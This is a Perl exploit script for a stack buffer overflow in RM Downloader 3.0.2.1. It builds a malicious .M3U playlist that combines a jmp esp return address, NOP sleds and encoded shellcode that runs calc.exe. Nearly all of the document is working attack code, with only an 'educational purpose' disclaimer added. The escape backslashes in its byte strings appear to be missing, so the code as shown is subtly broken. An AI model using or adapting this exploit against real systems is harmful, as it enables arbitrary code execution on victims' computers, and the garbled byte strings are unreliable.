#!/usr/bin/perl
# *********************************************************
# *  RM Downloader 3.0.2.1(.M3U File) Stack Overflow exploit   *
# *********************************************************
#
# Author: Vinod Sharma
# Download :  http://www.rm-to-mp3.net/downloads/RMDownloader.exe
# Tested : Windows XP SP2 (En)
# Thanks to exploit-db,packetstormsecurity and all security folks
# Originally published at :http://securitygyan.com/2009/12/14/rm-downloader-m3u-exploit/
#Vulnerability discovered by CYBER-ZONE(http://www.exploit-db.com/exploits/8404)
#::::::NOTE: This exploit is only for educational purpose. If you use it for any malicious activity then author will not bear any:::
#::::responsibility.
my $Header = "#EXTM3Un";
my $eip= pack('V', 0x01be8b59);  # jmp esp from RDcodec02.dll
my $nop= "x90" x 256;
my $nop2="x90" x 8;
my $nop3="x90" x 100;

####Calc.exe######
$shellcode = $shellcode.
"x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4".
"x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exff".
"xd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8".
"xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69".
"x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3".
"xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76".
"xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07".
"x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57".
"x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9d".
"x7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62".
"x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3c".
"xb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27".
"xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0".
"x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xed".
"x72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66".
"xf3x07";


$ex="http://F".$nop.$eip.$nop2.$shellcode."A" x 26280 ;

open(MYFILE,'>>exploit.m3u');

print MYFILE $Header.$ex;

close(MYFILE);